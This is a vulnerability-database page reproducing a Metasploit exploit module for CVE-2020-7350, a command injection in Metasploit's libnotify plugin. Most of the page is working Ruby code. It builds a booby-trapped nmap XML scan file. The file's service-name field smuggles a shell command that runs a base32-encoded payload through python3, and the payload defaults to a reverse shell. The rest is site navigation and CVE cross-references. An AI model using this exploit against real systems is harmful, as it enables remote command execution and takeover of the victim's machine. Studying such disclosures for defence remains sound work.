Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMetasploit1337DAY-ID-34261
HistoryApr 18, 2020 - 12:00 a.m.

Metasploit Libnotify Arbitrary Command Execution Exploit

2020-04-1800:00:00
metasploit
0day.today
11

0.008 Low

EPSS

Percentile

81.7%

JSON
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
                      'Name'           => 'Metasploit Libnotify Plugin Arbitrary Command Execution',
                      'Description'    => %q(
        This module exploits a shell command injection vulnerability in the
        libnotify plugin. This vulnerability affects Metasploit versions
        5.0.79 and earlier.
      ),
                      'DisclosureDate' => 'Mar 04 2020',
                      'License'        => GPL_LICENSE,
                      'Author'         =>
                        [
                          'pasta <[emailΒ protected]>' # Discovery and PoC
                        ],
                      'References'     =>
                        [
                          [ 'CVE', '2020-7350' ],
                          [ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ]
                        ],
                      'Platform'       => 'unix',
                      'Arch'           => ARCH_CMD,
                      'Payload'        =>
                        {
                          'DisableNops' => true
                        },
                      'DefaultOptions' =>
                        {
                          'PAYLOAD' => 'cmd/unix/reverse_python'
                        },
                      'Targets' => [[ 'Automatic', {}]],
                      'Privileged' => false,
                      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml']),
      ]
    )
  end

  def exploit
    xml = %(<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<nmaprun scanner="nmap" args="nmap -P0 -oA pepito 192.168.20.121" start="1583503480" startstr="Fri Mar  6 11:04:40 2020" version="7.60" xmloutputversion="1.04">
<host starttime="1583503480" endtime="1583503480"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="192.168.20.121" addrtype="ipv4"/>
<hostnames>
</hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh';python3 -c "import os,base64;os.system(base64.b32decode(b'#{Rex::Text.encode_base32(payload.encoded)}'.upper()))"&; printf '" method="table" conf="3"/></port>
</ports>
<times srtt="6174" rttvar="435" to="100000"/>
</host>
<runstats><finished time="1583503480" timestr="Fri Mar  6 11:04:40 2020" elapsed="0.22" summary="Nmap done at Fri Mar  6 11:04:40 2020; 1 IP address (1 host up) scanned in 0.22 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>
)

    print_status "Writing xml file: #{datastore['FILENAME']}"
    file_create xml
  end
end

Related

attackerkb 1
cve 1
prion 1
cvelist 1
nvd 1
packetstorm 1
attackerkb
attackerkb
CVE-2020-7350
2020-04-16 00:00:00
cve
cve
CVE-2020-7350
2020-04-22 22:15:12
prion
prion
Command injection
2020-04-22 22:15:00
cvelist
cvelist
CVE-2020-7350 Metasploit Framework Plugin Libnotify Command Injection
2020-04-16 00:00:00
nvd
nvd
CVE-2020-7350
2020-04-22 22:15:12
packetstorm
packetstorm
Metasploit Libnotify Arbitrary Command Execution
2020-04-17 00:00:00

0.008 Low

EPSS

Percentile

81.7%

JSON
Related for 1337DAY-ID-34261
attackerkb1cve1prion1cvelist1nvd1packetstorm1